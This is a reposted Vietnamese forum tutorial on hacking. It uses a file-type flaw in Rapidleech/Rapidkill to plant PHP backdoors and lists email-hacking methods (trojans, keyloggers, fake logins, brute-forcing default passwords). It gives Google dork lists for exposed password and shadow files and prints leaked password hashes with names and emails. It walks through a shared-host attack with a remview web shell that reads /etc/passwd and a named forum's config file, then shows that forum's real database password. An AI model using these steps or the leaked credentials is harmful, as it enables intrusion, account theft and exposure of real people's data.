Hack website sử dụng rapidleech

Thảo luận trong "Tin Công Nghệ"

  1. ineedyou

    ineedyou

    Số bài viết: 95
    Đã được thích:6
    Điểm thành tích: 18
    h*ck Website sử dụng Rapidleech, Rapidkill:
    Rapidleech và Rapidkill là 2 script viết bằng PHP, hỗ trợ download file ở rapidshare sang hosting.

    Bài viết sẽ dựa trên một sơ hở nhỏ mà Rapidleech, Rapidkill mắc phải đó là không phân biệt loại tập tin được tải vào hosting. Và tui sẽ tận dụng sơ hở đó để tải backdoor = PHP vô

    1. Đầu tiên bạn lên google gõ “rapidleech v2.2″ hoặc “Rapidkill”, sau khi tìm được website nào có sử dụng chúng thì bạn lưu lại.

    2. Tiếp đến bạn vào RapidShare AG, Cham, Switzerland upload 1 con backdoor lên đó, rồi lưu link lại.

    3. Mở trang web chứa Rapidleech hoặc Rapidkill mà bạn tìm được ở Bước 1, tìm đến khung nhập URL rapidshare, bạnn nnhập vào link con backdoor ở Bước 2.

    4. Như vậy là backdoor đã được upload, giả sử website có link là:
    domain.com/rapidleech/

    Và backdoor có link là: (Giả sử thôi nha)
    rapidshare.de/files/21461115/testtest.php.html

    Bạn truy nhập vào backdoor theo đường dẫn:
    domain.com/rapidleech/testtest.php

    * Cách fix lỗi của Rapidleech, rapidkill tương tự:
    Mở file function.php, tìm đoạn:

    Code:

    fputs($fp,$zapros);
    fflush($fp);

    Thêm vào bên dưới đoạn:

    Code:

    $link = strtolower($_GET['link']);
    $link = explode(”.”, $link);

    if ( $link[count($link)-2] == “php” )
    {
    print “Link không hợp lệ.”;
    exit;
    }

    Vì cốt lõi cái này nó nhận link ở biến $link nên chỉ cần check ở đấy là ok.

    * h*ck Mail:
    Cach1 :
    Hỏi trực tiếp : thật điên rồ .
    Cach 2 :
    Bạn biết thông tin về người đó ,vậy hãy nhỡ yahoo giúp đỡ.Cách này trược kia có thể thực hiện được nhưng bây giờ yahoo không cho request.
    Cach 3 :
    Sử dụng virut-trojan. đây là cách hay sử dụng nhất của hacker.Có rất nhiều bài viết hướng dẫn các bạn hãy tự tham khảo.Có hàng trăm virut trojan cho bạn lựa chọn tùy bạn thui.
    Cach 4 :
    Sử dụng các chương trình cr*ck(bẻ )
    ví dụ yahoomail thì có:cr*ckpassyahoo
    hotmail thì có :cr*ck passhotmail.
    Cach 5 :
    Sử dụng các chương trình fake( bẫy lỗi) như fake login, giả giao diện mail…….
    Cach 6 :Bạn có một website tại sao không sử dụng Godwill gắn chúng vô web .
    Cach 7 : Nếu ở dịch vụ bạn đang ngồi có thể sử dụng keylogger 5.04,perfecf keyloggerv1.47, starrcmd……..rất nhiều.
    Cach 8 : Tấn công phê chuẩn đầu vào .
    với cách này bạn có thể vào mail mà không cần đăng nhập .Thật bất ngờ khi vào mà không cần biết pass hì.
    Cach 9 :

    Lỗi đơn giản lắm password yahoo bị mắc lỗi default password
    ” yahoo***”
    vậy *** ở đây là gì đơn giản là 3 con số những số này nằm trong khoảng từ 0–>999 việc brute chở nên dễ dàng rồi………….
    Tuy nhiên big problem nằm ở chỗ nếu hì hục nghiên cứu làm sao modify info ngay tại yahoo thì có vẻ như không được ổn . Nhớ rằng yahoo là reseller của INWW việc chúng ta cần làm là nhào vô cái Registry key để lấy info sau đó quay ra inww.com để change infor
    Chúc các bạn thành công. (Nhưng trong 9 cách này, bi giờ chắc chỉ còn áp dụng được một vài cách thoai! “Gà” bây giờ hiếm lắm nên cũng hok “Múa rìu qua mắt …pro” được!

    *h*ck bằng Google:
    Cách đây vài ngày tôi có đọc trên một forum nói về cách có thể dùng Goggle.com để tìm các thông tin quan trọng mà không cần bẻ khóa một website nào hết.
    Bạn biết đối Google.com khi “search” bạn có thể dùng một số từ khóa để tìm một số cụm từ của các website thường không muốn người khác vào.Google là một công cụ tuyệt vời nếu các bạn dùng sẽ cảm thấy nó hay thế nào
    Vậy chúng ta hảy bắt đầu nha.
    Bạn vào website google.com và bắt đầu đánh dòng lệnh sau trên ô Search:

    allintitle: “index of/root”

    Sau đó bạn sẻ thấy khoảng 3120 sites có cụm từ này, bây giờ bạn có thể từng cái một kiểm tra xem có thông tin nào bạn cần không,

    Thế nhưng có bạn không thích các thông tin này, nhưng lại thích tìm hiểu về password của admin các site, các bạn có thể đánh dòng lệnh sau:

    inurl:”auth_user_file.txt”

    Wow, bây giờ các bạn tha hồ mà nghiên cứu password & username, khi tôi đánh dòng lệnh này, website đầu tiên mà tôi bấm vào là Here và nó cho tôi data như sau:

    $1$nr$90wmeMQIDw0HforiU2vUG1|admin|admin|Martin|Kl ässner|[email protected]|on
    $1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Martin|norm al|Martin|Klässner|[email protected]|on
    $1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Juergen|nor mal|Jürgen|Klässner|[email protected]|on
    $1$as$reDTTzzp8RaJUXVjXNksi0|Mauer_Harald|normal|H arald|Mauer|[email protected]|on

    Cái này là cái gì vậy nè, phần này dành cho các cao thủ diển dịch nhen hihihi.

    Nói chung với Google.com các bạn có thể dùng các chuổi sau đây, và chắc chắn các bạn sẻ không bao giờ chán khi lên net nửa đâu.

    “Index of /admin”
    “Index of /password”
    “Index of /mail”
    “Index of /” +passwd
    “Index of /” +password.txt
    “Index of /” +.htaccess
    index of ftp +.mdb allinurl:/cgi-bin/ +mailto

    administrators.pwd.index
    authors.pwd.index
    service.pwd.index
    filetype:config web
    gobal.asax index

    allintitle: “index of/admin”
    allintitle: “index of/root”
    allintitle: sensitive filetypeoc
    allintitle: restricted filetype :mail
    allintitle: restricted filetypeoc site:gov

    inurlasswd filetype:txt
    inurl:admin filetypeb
    inurl:iisadmin
    inurl:”auth_user_file.txt”
    inurl:”wwwroot/*.”

    top secret site:mil
    confidential site:mil

    allinurl: winnt/system32/ (get cmd.exe)
    allinurl:/bash_history

    intitle:”Index of” .sh_history
    intitle:”Index of” .bash_history
    intitle:”index of” passwd
    intitle:”index of” people.lst
    intitle:”index of” pwd.db
    intitle:”index of” etc/shadow
    intitle:”index of” spwd
    intitle:”index of” master.passwd
    intitle:”index of” htpasswd
    intitle:”index of” members OR accounts
    intitle:”index of” user_carts OR user_cart

    ALTERNATIVE INPUTS

    _vti_inf.html
    service.pwd
    users.pwd
    authors.pwd
    administrators.pwd
    shtml.dll
    shtml.exe
    fpcount.exe
    default.asp
    showcode.asp
    sendmail.cfm
    getFile.cfm
    imagemap.exe
    test.bat
    msadcs.dll
    htimage.exe
    counter.exe
    browser.inc
    hello.bat
    default.asp\
    dvwssr.dll
    cart32.exe
    add.exe
    index.jsp
    SessionServlet
    shtml.dll
    index.cfm
    page.cfm
    shtml.exe
    web_store.cgi
    shop.cgi
    upload.asp
    default.asp
    pbserver.dll
    phf
    test-cgi
    finger
    Count.cgi
    jj
    php.cgi
    php
    nph-test-cgi
    handler
    webdist.cgi
    webgais
    websendmail
    faxsurvey
    htmlscript
    perl.exe
    wwwboard.pl
    www-sql
    view-source
    campas
    aglimpse
    glimpse
    man.sh
    AT-admin.cgi
    AT-generate.cgi
    filemail.pl
    maillist.pl
    info2www
    files.pl
    bnbform.cgi
    survey.cgi
    classifieds.cgi
    wrap
    cgiwrap
    edit.pl
    perl
    names.nsf
    webgais
    dumpenv.pl
    test.cgi
    submit.cgi
    guestbook.cgi
    guestbook.pl
    cachemgr.cgi
    responder.cgi
    perlshop.cgi
    query
    w3-msql
    plusmail
    htsearch
    infosrch.cgi
    publisher
    ultraboard.cgi
    db.cgi
    formmail.cgi
    allmanage.pl
    ssi
    adpassword.txt
    redirect.cgi
    cvsweb.cgi
    login.jsp
    dbconnect.inc
    admin
    htgrep
    wais.pl
    amadmin.pl
    subscribe.pl
    news.cgi
    auctionweaver.pl
    .htpasswd
    acid_main.php
    access.log
    log.htm
    log.html
    log.txt
    logfile
    logfile.htm
    logfile.html
    logfile.txt
    logger.html
    stat.htm
    stats.htm
    stats.html
    stats.txt
    webaccess.htm
    wwwstats.html
    source.asp
    perl
    mailto.cgi
    YaBB.pl
    mailform.pl
    cached_feed.cgi
    global.cgi
    Search.pl
    build.cgi
    common.php
    show
    global.inc
    ad.cgi
    WSFTP.LOG
    index.html~
    ~
    index.html.bak
    .bak
    print.cgi
    register.cgi
    webdriver
    bbs_forum.cgi
    mysql.class
    sendmail.inc
    CrazyWWWBoard.cgi
    search.pl
    way-board.cgi
    webpage.cgi
    pwd.dat
    adcycle
    post-query
    help.cgi
    * h*ck 4rum (cũng chỉ là 1 cách h*ck local cổ điển thoai)

    Chào các bạn , hôm nay mình xin giới thiệu 1 cách h*ck forum , theo tôi nghĩ nó ở mức nguy hiểm cao , hầu hết các diễn đàn php đều có cơ sở dữ SQL và nội dung bài viết này làm cách nào là đọc file config.php , trong khi họ đã chmod để lấy pass mySQL của victim , sữ dụng phpmyadmin để drop hay đoạt quyền admin diễn đàn . Nếu bạn là 1 hacker tôi nói đến đây là kết thúc bài viết , tôi nghĩ bạn đủ thông minh để hiểu và không nên mất thời gian xem những cái mà mình đã biết rồi . Còn ngược lại bạn chưa hiểu thì chúng ta tiếp tục sang bước tiếp theo nhé .bài viết này dành cho newbie Okie chứ?

    Ở đây tôi lấy 1 site vd http://www.forums.ngoisaonho.info/ site này mới thành lập chưa có thành viên nên mức độ ảnh hưởng sẽ không cao , cho việc tôi dùng nó để miêu tả 1 bài viết . Bạn dùng 1 công cụ để kiểm tra victim của bạn mua host ở đâu http://www.checkdomain.com/ bạn có thể dùng nó ! chúng ta tiếp tục nhé

    Bước 1 : Up load backdoor lên host của bạn cùng sever lên host victim . Tôi dùng remview bạn dùng cái gì thì tuỳ (vào google đánh từ khóa remview để down về . vì có nhiều cách để local . có thể dùng cgitelnet cũng được)
    copy đoạn code remview.php
    down tại http://www.ktv4vn.com/rem.zip

    Bước 2
    okie ! up con backdoor này lên host của bạn và chạy nó với link

    http://www.localhost.com/remview.php

    Có 1 khó khăn cho tôi khi host của victim chmod khả chuẩn khiến tôi không thể view host . Tôi phải đi đường vòng sữ dụng chức năng Shell commands
    okie trong Shell commands bạn cho run lệnh

    Trích:

    cat /etc/passwd;

    Trích:

    ngoisaon:x:33217:33218::/home/ngoisaon:/usr/local/cpanel/bin/noshell

    Tiếp trong shell commands bạn cho run lệnh
    cat /etc/userdomains;

    Tôi tìm đúng domain của victim như vậy ta có user victim là ngoisaon

    Trích:

    ngoisaonho.info: ngoisaon
    Như phần trên đã nói host victim chmod khá chuẩn nên tôi phải tiếp tục sữ dụng công cụ Shell commands để view host victim
    trong Shell commands run lệnh dir với user bạn vừa tìm được như sau:
    dir /home/victim/public_html/;
    thu được

    Trích:

    cgi-bin index.htm _private _vti_inf.html _vti_txt xoa
    diendan music _vti_bin _vti_log wait.gif
    forums postinfo.html _vti_cnf _vti_pvt welcome

    Chạy tiếp lện dir để view thư mục forums
    dir /home/victim/public_html/forums;
    thu được

    Trích:

    admin.php fonts MBinstall.php style_images
    cache html modules uploads
    cgi-bin icon_db_hack.php show.php viewsong.php
    conf_global.php index.php Skin xoa
    conf_mime_types.php install_templates.txt sources
    css.php ipchat.php ssi.php
    datamusic.sql lang ssi_templates

    Cái mà tôi cần view là file conf_global.php run với lện cat như sau :
    cat /home/victim/public_html/forums/conf_global.php;

    Trích:

    $INFO['sql_database'] = ‘ngoisaon_Forums’;
    $INFO['sql_driver'] = ‘mySQL’;
    $INFO['sql_host'] = ‘localhost’;
    $INFO['sql_pass'] = ‘HANOIMUATHU’;

    Đến đây bạn đã lấy thấy được user : ngoisaon_Forums và pass là HANOIMUATHU , việc còn lại là dùng nó để vào phpmyadmin của victim , bạn vào phpmyadmin sẽ có rất nhiều cho vui , nên nhớ rằng để người khác vào phpmyadmin của mình điều này còn tệ hơn việc victim bị h*ck pass admin trong forum , bạn có thể vào phpmyadmin của victim bằng nhiều cách có thể tìm link của victim hay setup phpmyadmin ở host bạn hay sữ dụng 1 tool nào đó để hổ trợ bạn làm việc này .
    Hình như remview này mọi người thường dùng
    Mã:
     http://php.spb.ru/remview/remview_2003_10_23.zip
    các bạn có thể chọn trang khác để thực hành, vì thời điểm mình đọc web còn live, nhưng bây giờ nó die rồi,. Mặc dù vậy mình vẫn để nguyên văn để tôn trọng tác giả.
    Sưu tầm ​
    :
  2. picachu

    picachu

    Số bài viết: 3,793
    Đã được thích:9,636
    Điểm thành tích: 48
  3. mylady

    mylady

    Số bài viết: 209
    Đã được thích:543
    Điểm thành tích: 48
    picachu a lại đào mộ :(

Chia sẻ trang này